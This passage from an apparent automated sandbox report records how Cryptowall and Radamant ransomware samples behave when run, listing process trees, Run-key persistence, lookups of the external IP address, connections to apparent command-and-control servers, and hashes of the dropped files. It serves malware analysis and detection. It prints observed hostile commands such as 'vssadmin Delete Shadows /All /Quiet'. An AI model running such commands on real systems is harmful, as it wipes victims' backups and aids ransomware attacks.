"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"
C:\Windows\syswow64\explorer.exe
"C:\Windows\syswow64\explorer.exe"
C:\Windows\syswow64\svchost.exe
-k netsvcs
C:\Windows\syswow64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-addr.es | udp |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 8.8.8.8:53 | myexternalip.com | udp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 94.247.31.19:8080 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| NL | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.117.118.44:80 | myexternalip.com | tcp |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| US | 209.148.85.151:8080 | tcp |
Files
memory/2404-13-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2404-12-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2404-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2404-8-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2404-6-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2404-4-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2404-2-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2404-0-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2404-15-0x0000000000400000-0x0000000000425000-memory.dmp
memory/3064-14-0x0000000000080000-0x00000000000A5000-memory.dmp
memory/2672-20-0x0000000000080000-0x00000000000A5000-memory.dmp
memory/2960-22-0x0000000000400000-0x00000000037E7000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240611-en
Max time kernel
1790s
Max time network
1177s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DirectX.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" | C:\Users\Admin\AppData\Roaming\DirectX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" | C:\Users\Admin\AppData\Roaming\DirectX.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"
C:\Users\Admin\AppData\Roaming\DirectX.exe
"C:\Users\Admin\AppData\Roaming\DirectX.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c aaa.bat
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im DUMP_00A10000-00A1D000.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.247.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
Files
memory/2552-0-0x0000000000400000-0x0000000000419000-memory.dmp
C:\Users\Admin\AppData\Roaming\DirectX.exe
| MD5 | 6152709e741c4d5a5d793d35817b4c3d |
| SHA1 | 05ae9c76f8f85ad2247c06d26a88bbbcfff4d62e |
| SHA256 | 2c4c8066a1a7dfdf42c57ff4f9016f1ba05bcb004ff8b0ffc0989165d2ad30e2 |
| SHA512 | 1e5ebd53ac942b0f06f759f936efebeeb9a74062647cd978d5112720f772f607b12ee20c02ab838104a7a947fef2fde79b0db944286d8daf2e6e6d16e10b9390 |
memory/1888-61-0x0000000000400000-0x0000000000419000-memory.dmp
memory/2552-65-0x0000000000400000-0x0000000000419000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\aaa.bat
| MD5 | 2861e1b3a96bd68affe71c9c07142aae |
| SHA1 | 13cdf1d8667309b8e92e630c6026f1bc94b40845 |
| SHA256 | 62a90c33cd71d3ecc13d6d002d1797e37042791819d1d24d3acbba53a4e834bb |
| SHA512 | 8f86a6f09e0a587cd533b1c3400d26196f7738972add27cbd34712eb85dc019f4c99f8406f1edbee8e31ed263fc7cd5f0c3fde7aa260a1c5ac820b00a7b117e8 |
memory/1888-67-0x0000000000400000-0x0000000000419000-memory.dmp
memory/1888-86-0x0000000000400000-0x0000000000419000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240611-en
Max time kernel
810s
Max time network
1217s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DirectX.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" | C:\Users\Admin\AppData\Roaming\DirectX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" | C:\Users\Admin\AppData\Roaming\DirectX.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\DUMP_00A10000-00A1D000.exe"
C:\Users\Admin\AppData\Roaming\DirectX.exe
"C:\Users\Admin\AppData\Roaming\DirectX.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c aaa.bat
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im DUMP_00A10000-00A1D000.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 193.122.130.0:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | tangotangocash.com | udp |
Files
memory/2120-0-0x0000000000400000-0x0000000000419000-memory.dmp
\Users\Admin\AppData\Roaming\DirectX.exe
| MD5 | 6152709e741c4d5a5d793d35817b4c3d |
| SHA1 | 05ae9c76f8f85ad2247c06d26a88bbbcfff4d62e |
| SHA256 | 2c4c8066a1a7dfdf42c57ff4f9016f1ba05bcb004ff8b0ffc0989165d2ad30e2 |
| SHA512 | 1e5ebd53ac942b0f06f759f936efebeeb9a74062647cd978d5112720f772f607b12ee20c02ab838104a7a947fef2fde79b0db944286d8daf2e6e6d16e10b9390 |
memory/2120-11-0x0000000003C60000-0x0000000003C79000-memory.dmp
memory/2800-12-0x0000000000400000-0x0000000000419000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Radamant\Ransomware.Radamant\aaa.bat
| MD5 | 2861e1b3a96bd68affe71c9c07142aae |
| SHA1 | 13cdf1d8667309b8e92e630c6026f1bc94b40845 |
| SHA256 | 62a90c33cd71d3ecc13d6d002d1797e37042791819d1d24d3acbba53a4e834bb |
| SHA512 | 8f86a6f09e0a587cd533b1c3400d26196f7738972add27cbd34712eb85dc019f4c99f8406f1edbee8e31ed263fc7cd5f0c3fde7aa260a1c5ac820b00a7b117e8 |
memory/2120-22-0x0000000000400000-0x0000000000419000-memory.dmp
memory/2800-24-0x0000000000400000-0x0000000000419000-memory.dmp